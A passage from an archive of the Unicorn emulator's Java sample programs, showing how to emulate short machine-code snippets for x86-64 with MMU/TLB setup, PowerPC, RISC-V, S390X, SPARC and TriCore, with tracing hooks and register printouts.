        uc.reg_write(UC_X86_REG_CR3, tlb_base);
        cr0 = uc.reg_read(UC_X86_REG_CR0);
        cr4 = uc.reg_read(UC_X86_REG_CR4);
        msr.value = (Long) uc.reg_read(UC_X86_REG_MSR, msr);

        cr0 |= 1;             // enable protected mode
        cr0 |= 1l << 31;      // enable paging
        cr4 |= 1l << 5;       // enable physical address extension
        msr.value |= 1l << 8; // enable long mode

        uc.reg_write(UC_X86_REG_CR0, cr0);
        uc.reg_write(UC_X86_REG_CR4, cr4);
        uc.reg_write(UC_X86_REG_MSR, msr);
    }

    private static void x86_mmu_pt_set(Unicorn uc, long vaddr, long paddr,
            long tlb_base) {
        long pto = ((vaddr & 0x000000001ff000L) >> 12) * 8;
        long pte = (paddr) | 1 | (1 << 2);
        uc.mem_write(tlb_base + 0x3000 + pto, Utils.toBytes((int) pte));
    }

    private static SyscallHook x86_mmu_syscall_callback = (uc, userdata) -> {
        boolean[] parent_done = (boolean[]) userdata;
        long rax = uc.reg_read(UC_X86_REG_RAX);
        switch ((int) rax) {
        case 57: /* fork */
            break;
        case 60: /* exit */
            parent_done[0] = true;
            uc.emu_stop();
            return;
        default:
            System.out.println("unknown syscall");
            System.exit(1);
        }

        if (!parent_done[0]) {
            rax = 27;
            uc.reg_write(UC_X86_REG_RAX, rax);
            uc.emu_stop();
        }
    };

    public static void cpu_tlb() {
        long tlb_base = 0x3000;
        long rip;
        boolean[] parent_done = { false };

        System.out.println(
            "Emulate x86 amd64 code with mmu enabled and switch mappings");

        Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64);
        uc.ctl_tlb_mode(UC_TLB_CPU);
        Unicorn.Context context = uc.context_save();

        uc.hook_add(x86_mmu_syscall_callback, UC_X86_INS_SYSCALL, 1, 0,
            parent_done);

        // Memory hooks are called after the mmu translation, so hook the
        // physical addresses
        uc.hook_add(mmu_write_callback, UC_HOOK_MEM_WRITE, 0x1000, 0x3000,
            null);

        System.out.println("map code");
        uc.mem_map(0x0, 0x1000, UC_PROT_ALL); // Code
        uc.mem_write(0x0, CODE);
        System.out.println("map parent memory");
        uc.mem_map(0x1000, 0x1000, UC_PROT_ALL); // Parent
        System.out.println("map child memory");
        uc.mem_map(0x2000, 0x1000, UC_PROT_ALL); // Child
        System.out.println("map tlb memory");
        uc.mem_map(tlb_base, 0x4000, UC_PROT_ALL); // TLB

        System.out.println("set up the tlb");
        x86_mmu_prepare_tlb(uc, 0x0, tlb_base);
        x86_mmu_pt_set(uc, 0x2000, 0x0, tlb_base);
        x86_mmu_pt_set(uc, 0x4000, 0x1000, tlb_base);
        uc.ctl_flush_tlb();

        System.out.println("run the parent");
        uc.emu_start(0x2000, 0x0, 0, 0);

        System.out.println("save the context for the child");
        uc.context_update(context);

        System.out.println("finish the parent");
        rip = uc.reg_read(UC_X86_REG_RIP);
        uc.emu_start(rip, 0x0, 0, 0);

        System.out.println("restore the context for the child");
        uc.context_restore(context);
        x86_mmu_prepare_tlb(uc, 0x0, tlb_base);
        x86_mmu_pt_set(uc,
            0x4000, 0x2000, tlb_base);
        uc.reg_write(UC_X86_REG_RAX, 0L);
        uc.ctl_flush_tlb();

        uc.emu_start(rip, 0x0, 0, 0);
        long parent = Utils.toLong(uc.mem_read(0x1000, Long.BYTES));
        long child = Utils.toLong(uc.mem_read(0x2000, Long.BYTES));
        System.out.format("parent result == %d\n", parent);
        System.out.format("child result == %d\n", child);
    }

    private static final TlbFillHook virtual_tlb_callback =
        (uc, addr, type, user_data) -> {
            boolean[] parent_done = (boolean[]) user_data;
            System.out.format("tlb lookup for address: 0x%X\n", addr);
            switch ((int) (addr & ~(0xfffL))) {
            case 0x2000:
                return 0x0L | UC_PROT_EXEC;
            case 0x4000:
                if (parent_done[0]) {
                    return (0x2000L) | UC_PROT_READ | UC_PROT_WRITE;
                } else {
                    return (0x1000L) | UC_PROT_READ | UC_PROT_WRITE;
                }
            default:
                return -1L;
            }
        };

    public static void virtual_tlb() {
        long rip;
        boolean[] parent_done = { false };
        System.out.println("Emulate x86 amd64 code with virtual mmu");

        Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64);
        uc.ctl_tlb_mode(UC_TLB_VIRTUAL);

        Unicorn.Context context = uc.context_save();

        uc.hook_add(x86_mmu_syscall_callback, UC_X86_INS_SYSCALL, 1, 0,
            parent_done);

        // Memory hooks are called after the mmu translation, so hook the
        // physical addresses
        uc.hook_add(mmu_write_callback, UC_HOOK_MEM_WRITE, 0x1000, 0x3000,
            null);

        System.out.println("map code");
        uc.mem_map(0x0, 0x1000, UC_PROT_ALL); // Code
        uc.mem_write(0x0, CODE);
        System.out.println("map parent memory");
        uc.mem_map(0x1000, 0x1000, UC_PROT_ALL); // Parent
        System.out.println("map child memory");
        uc.mem_map(0x2000, 0x1000, UC_PROT_ALL); // Child
        uc.hook_add(virtual_tlb_callback, 1, 0, parent_done);

        System.out.println("run the parent");
        uc.emu_start(0x2000, 0x0, 0, 0);

        System.out.println("save the context for the child");
        uc.context_update(context);

        System.out.println("finish the parent");
        rip = uc.reg_read(UC_X86_REG_RIP);
        uc.emu_start(rip, 0x0, 0, 0);

        System.out.println("restore the context for the child");
        uc.context_restore(context);
        parent_done[0] = true;
        uc.reg_write(UC_X86_REG_RAX, 0);
        uc.ctl_flush_tlb();

        uc.emu_start(rip, 0x0, 0, 0);
        long parent = Utils.toLong(uc.mem_read(0x1000, Long.BYTES));
        long child = Utils.toLong(uc.mem_read(0x2000, Long.BYTES));
        System.out.format("parent result == %d\n", parent);
        System.out.format("child result == %d\n", child);
    }

    public static final void main(String[] args) {
        cpu_tlb();
        System.out.println("------------------");
        virtual_tlb();
    }
}
unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_ppc.java000066400000000000000000000056161467524106700250110ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine

Copyright(c) 2023 Robert Xiao

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

/* Sample code to demonstrate how to emulate PPC code */

package samples;

import unicorn.*;

public class Sample_ppc implements UnicornConst, PpcConst {

    /** code to be emulated:
     * {@code add r26, r6, r3}
     */
    private static final byte[] CODE = Utils.hexToBytes("7F461A14");

    // memory address where emulation starts
    private static final long ADDRESS = 0x10000;

    private static final BlockHook hook_block =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing basic block at 0x%x, block size = 0x%x\n",
                address, size);
        };

    private static final CodeHook hook_code =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n",
                address, size);
        };

    public static void test_ppc() {
        long r3 = 0x1234;  // R3 register
        long r6 = 0x6789;  // R6 register
        long r26 = 0x8877; // R26 register (result)

        System.out.println("Emulate PPC code");

        Unicorn uc =
            new Unicorn(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE);

        // initialize machine registers
        uc.reg_write(UC_PPC_REG_3, r3);
        uc.reg_write(UC_PPC_REG_6, r6);
        uc.reg_write(UC_PPC_REG_26, r26);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing one instruction at ADDRESS with customized callback
        uc.hook_add(hook_code, ADDRESS, ADDRESS + CODE.length, null);

        // emulate machine code in infinite time (last param = 0), or when
        // finishing all the code.
        uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0);

        // now print out some registers
        System.out.println(">>> Emulation done. Below is the CPU context");
        System.out.format(">>> r26 = 0x%x\n", uc.reg_read(UC_PPC_REG_26));
    }

    public static final void main(String[] args) {
        test_ppc();
    }
}
unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_riscv.java000066400000000000000000000362241467524106700253560ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine

Copyright(c) 2023 Robert Xiao

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

/* Sample code to demonstrate how to emulate RISC-V code */

package samples;

import unicorn.*;

public class Sample_riscv implements UnicornConst, RiscvConst {

    /** code to be emulated:
     * <pre>
     * $ cstool riscv64 1305100093850502
     *  0  13 05 10 00  addi   a0, zero, 1
     *  4  93 85 05 02  addi   a1, a1, 0x20
     * </pre>
     */
    private static final byte[] CODE = Utils.hexToBytes("1305100093850502");

    // memory address where emulation starts
    private static final long ADDRESS = 0x10000;

    private static final BlockHook hook_block =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing basic block at 0x%x, block size = 0x%x\n",
                address, size);
        };

    private static final CodeHook hook_code =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n",
                address, size);
        };

    private static final CodeHook hook_code3 =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n",
                address, size);
            if (address == ADDRESS) {
                System.out.println("stop emulation");
                uc.emu_stop();
            }
        };

    /*
       00813823 sd s0,16(sp)
       00000013 nop
    */
    private static final byte[] CODE64 = Utils.hexToBytes("2338810013000000");

    // 10000: 00008067 ret
    // 10004: 8082     c.ret
    // 10006: 0001     nop
    // 10008: 0001     nop
    private static final byte[] FUNC_CODE =
        Utils.hexToBytes("67800000828001000100");

    public static void test_riscv() {
        long a0 = 0x1234L;
        long a1 = 0x7890L;

        System.out.println("Emulate RISCV code");

        // Initialize emulator in RISCV32 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE);

        // initialize machine registers
        uc.reg_write(UC_RISCV_REG_A0, a0);
        uc.reg_write(UC_RISCV_REG_A1, a1);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code, 1, 0, null);

        // emulate machine code in infinite time (last param = 0), or when
        // finishing all the code.
        uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0);

        // now print out some registers
        System.out.println(">>> Emulation done. Below is the CPU context");
        System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0));
        System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1));
    }

    public static void test_riscv2() {
        long a0 = 0x1234L;
        long a1 = 0x7890L;

        System.out.println("Emulate RISCV code: split emulation");

        // Initialize emulator in RISCV32 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE);

        // initialize machine registers
        uc.reg_write(UC_RISCV_REG_A0, a0);
        uc.reg_write(UC_RISCV_REG_A1, a1);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code, 1, 0, null);

        // emulate 1 instruction
        uc.emu_start(ADDRESS, ADDRESS + 4, 0, 0);

        System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0));
        System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1));

        // emulate one more instruction
        uc.emu_start(ADDRESS + 4, ADDRESS + 8, 0, 0);

        // now print out some registers
        System.out.println(
            ">>> Emulation done. Below is the CPU context");
        System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0));
        System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1));
    }

    public static void test_riscv3() {
        long a0 = 0x1234L;
        long a1 = 0x7890L;

        System.out.println("Emulate RISCV code: early stop");

        // Initialize emulator in RISCV32 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE);

        // initialize machine registers
        uc.reg_write(UC_RISCV_REG_A0, a0);
        uc.reg_write(UC_RISCV_REG_A1, a1);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code3, 1, 0, null);

        // emulate machine code in infinite time (last param = 0), or when
        // finishing all the code.
        uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0);

        // now print out some registers
        System.out.println(">>> Emulation done. Below is the CPU context");
        System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0));
        System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1));
    }

    public static void test_riscv_step() {
        long a0 = 0x1234L;
        long a1 = 0x7890L;
        long pc = 0x0000L;

        System.out.println("Emulate RISCV code: step");

        // Initialize emulator in RISCV32 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE);

        // initialize machine registers
        uc.reg_write(UC_RISCV_REG_A0, a0);
        uc.reg_write(UC_RISCV_REG_A1, a1);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code, 1, 0, null);

        // emulate 1 instruction
        uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 1);
        pc = uc.reg_read(UC_RISCV_REG_PC);

        System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0));
        System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1));

        if (pc != 0x10004) {
            System.out.format(
                "Error after step: PC is: 0x%x, expected was 0x10004\n", pc);
        }

        // emulate one more instruction
        uc.emu_start(ADDRESS + 4, ADDRESS + 8, 0, 0);

        // now print out some registers
        System.out.println(">>> Emulation done. Below is the CPU context");
        System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0));
        System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1));
    }

    public static void test_riscv_timeout() {
        long a0 = 0x1234L;
        long a1 = 0x7890L;
        long pc = 0x0000L;

        System.out.println("Emulate RISCV code: timeout");

        // Initialize emulator in RISCV32 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV32);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        // TODO(nneonneo): what code was meant to go here? sample_riscv.c
        // has all zeros, but that just crashes without running into the
        // timeout...
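        // (A hypothetical filler that keeps PC at ADDRESS is a self-loop,
        // e.g. `jal x0, 0`, little-endian bytes 6F 00 00 00; note that the
        // instruction count of 1 below stops the run after one instruction
        // anyway, so the 1000us timeout is hard to observe here.)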
        uc.mem_write(ADDRESS, new byte[8]);

        // initialize machine registers
        uc.reg_write(UC_RISCV_REG_A0, a0);
        uc.reg_write(UC_RISCV_REG_A1, a1);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code, 1, 0, null);

        // emulate 1 instruction with timeout
        uc.emu_start(ADDRESS, ADDRESS + 4, 1000, 1);
        pc = uc.reg_read(UC_RISCV_REG_PC);

        if (pc != 0x10000) {
            System.out.format(
                "Error after step: PC is: 0x%x, expected was 0x10000\n", pc);
        }

        // emulate 1 instruction with timeout
        uc.emu_start(ADDRESS, ADDRESS + 4, 1000, 1);
        pc = uc.reg_read(UC_RISCV_REG_PC);

        if (pc != 0x10000) {
            System.out.format(
                "Error after step: PC is: 0x%x, expected was 0x10000\n", pc);
        }

        // now print out some registers
        System.out.println(">>> Emulation done");
    }

    public static void test_riscv_sd64() {
        long reg;

        System.out.println("Emulate RISCV code: sd64 instruction");

        // Initialize emulator in RISCV64 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV64);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE64);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code, 1, 0, null);

        reg = ADDRESS + 0x100;
        uc.reg_write(UC_RISCV_REG_SP, reg);

        reg = 0x11223344;
        uc.reg_write(UC_RISCV_REG_S0, reg);

        // execute instruction
        uc.emu_start(0x10000, -1, 0, 1);

        // now print out some registers
        System.out.println(">>> Emulation done.");
    }

    private static final EventMemHook hook_memalloc =
        (uc, type, address, size, value, user_data) -> {
            long aligned_address = address & ~0xFFFL;
            int aligned_size = ((int) (size / 0x1000) + 1) * 0x1000;

            System.out.format(
                ">>> Allocating block at 0x%x (0x%x), block size = 0x%x (0x%x)\n",
                address, aligned_address, size, aligned_size);

            uc.mem_map(aligned_address, aligned_size, UC_PROT_ALL);

            // this recovers from missing memory, so we return true
            return true;
        };

    public static void test_recover_from_illegal() {
        long a0 = 0x1234L;
        long a1 = 0x7890L;

        System.out.println("Emulate RISCV code: recover_from_illegal");

        // Initialize emulator in RISCV64 mode
        Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV64);

        uc.reg_write(UC_RISCV_REG_A0, a0);
        uc.reg_write(UC_RISCV_REG_A1, a1);

        // map 2MB memory for this emulation
        uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // auto-allocate memory on access
        uc.hook_add(hook_memalloc, UC_HOOK_MEM_UNMAPPED, 1, 0, null);

        // tracing all basic blocks with customized callback
        uc.hook_add(hook_block, 1, 0, null);

        // tracing all instructions
        uc.hook_add(hook_code, 1, 0, null);

        // write machine code to be emulated to memory
        uc.mem_write(ADDRESS, CODE);

        // emulate 1 instruction, wrong address, illegal code
        try {
            uc.emu_start(0x1000, -1, 0, 1);
            throw new RuntimeException("emu_start should have failed!");
        } catch (UnicornException e) {
            System.out.println("Expected Illegal Instruction error, got: " + e);
        }

        // emulate 1 instruction, correct address, valid code
        uc.emu_start(ADDRESS, -1, 0, 1);

        // now print out some registers
        System.out.println(">>> Emulation done. 
Below is the CPU context"); System.out.format(">>> A0 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A0)); System.out.format(">>> A1 = 0x%x\n", uc.reg_read(UC_RISCV_REG_A1)); } public static void test_riscv_func_return() { long pc = 0, ra = 0; System.out.println("Emulate RISCV code: return from func"); // Initialize emulator in RISCV64 mode Unicorn uc = new Unicorn(UC_ARCH_RISCV, UC_MODE_RISCV64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, FUNC_CODE); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction uc.hook_add(hook_code, 1, 0, null); // set return address register // RET instruction will return to address in RA // so after RET, PC == RA ra = 0x10006; uc.reg_write(UC_RISCV_REG_RA, ra); // execute ret instruction uc.emu_start(0x10000, -1, 0, 1); pc = uc.reg_read(UC_RISCV_REG_PC); if (pc != ra) { System.out.format( "Error after execution: PC is: 0x%x, expected was 0x%x\n", pc, ra); if (pc == 0x10000) { System.out.println(" PC did not change during execution"); } } else { System.out.println("Good, PC == RA"); } // set return address register // C.RET instruction will return to address in RA // so after C.RET, PC == RA ra = 0x10006; uc.reg_write(UC_RISCV_REG_RA, ra); System.out.println("========"); // execute c.ret instruction uc.emu_start(0x10004, -1, 0, 1); pc = uc.reg_read(UC_RISCV_REG_PC); if (pc != ra) { System.out.format( "Error after execution: PC is: 0x%x, expected was 0x%x\n", pc, ra); if (pc == 0x10004) { System.out.println(" PC did not change during execution"); } } else { System.out.println("Good, PC == RA"); } // now print out some registers System.out.println(">>> Emulation done."); } public static final void main(String[] args) { test_recover_from_illegal(); System.out.println("------------------"); test_riscv(); System.out.println("------------------"); test_riscv2(); System.out.println("------------------"); test_riscv3(); System.out.println("------------------"); test_riscv_step(); // System.out.println("------------------"); // test_riscv_timeout(); System.out.println("------------------"); test_riscv_sd64(); System.out.println("------------------"); test_riscv_func_return(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_s390x.java000066400000000000000000000054411467524106700251130ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ /* Sample code to demonstrate how to emulate S390X code */ package samples; import unicorn.*; public class Sample_s390x implements UnicornConst, S390xConst { /** code to be emulated: * {@code lr %r2, %r3} */ private static final byte[] CODE = Utils.hexToBytes("1823"); // memory address where emulation starts private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_s390x() { long r2 = 2, r3 = 3; System.out.println("Emulate S390X code"); Unicorn uc = new Unicorn(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // initialize machine registers uc.reg_write(UC_S390X_REG_R2, r2); uc.reg_write(UC_S390X_REG_R3, r3); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS + CODE.length, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> R2 = 0x%x\t\t>>> R3 = 0x%x\n", uc.reg_read(UC_S390X_REG_R2), uc.reg_read(UC_S390X_REG_R3)); } public static final void main(String[] args) { test_s390x(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_sparc.java000066400000000000000000000061171467524106700253360ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Sparc code */ package samples; import unicorn.*; public class Sample_sparc implements UnicornConst, SparcConst { /** code to be emulated: * {@code add %g1, %g2, %g3} */ private static final byte[] SPARC_CODE = Utils.hexToBytes("86004002"); //public static final byte[] SPARC_CODE = Utils.hexToBytes("bb700000"); //illegal code // memory address where emulation starts private static final int ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_sparc() { long g1 = 0x1230L; // G1 register long g2 = 0x6789L; // G2 register long g3 = 0x5555L; // G3 register System.out.print("Emulate SPARC code\n"); // Initialize emulator in Sparc mode Unicorn u = new Unicorn(UC_ARCH_SPARC, UC_MODE_32 | UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, SPARC_CODE); // initialize machine registers u.reg_write(UC_SPARC_REG_G1, g1); u.reg_write(UC_SPARC_REG_G2, g2); u.reg_write(UC_SPARC_REG_G3, g3); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + SPARC_CODE.length, 0, 0); // now print out some registers System.out.print(">>> Emulation done. Below is the CPU context\n"); System.out.format(">>> G3 = 0x%x\n", u.reg_read(UC_SPARC_REG_G3)); } public static void main(String args[]) { test_sparc(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_tricore.java000066400000000000000000000054321467524106700256740ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ /* Sample code to demonstrate how to emulate TriCore code * Ported from the C version originally by Eric Poole , 2022 */ package samples; import unicorn.*; public class Sample_tricore implements UnicornConst, TriCoreConst { /** code to be emulated: * {@code mov d1, #0x1; mov.u d0, #0x8000} */ private static final byte[] CODE = Utils.hexToBytes("8211bb000008"); // memory address where emulation starts private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_tricore() { System.out.println("Emulate TriCore code"); Unicorn uc = new Unicorn(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS + CODE.length, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> d0 = 0x%x\n", uc.reg_read(UC_TRICORE_REG_D0)); System.out.format(">>> d1 = 0x%x\n", uc.reg_read(UC_TRICORE_REG_D1)); } public static final void main(String[] args) { test_tricore(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_x86.java000066400000000000000000001156511467524106700246570ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
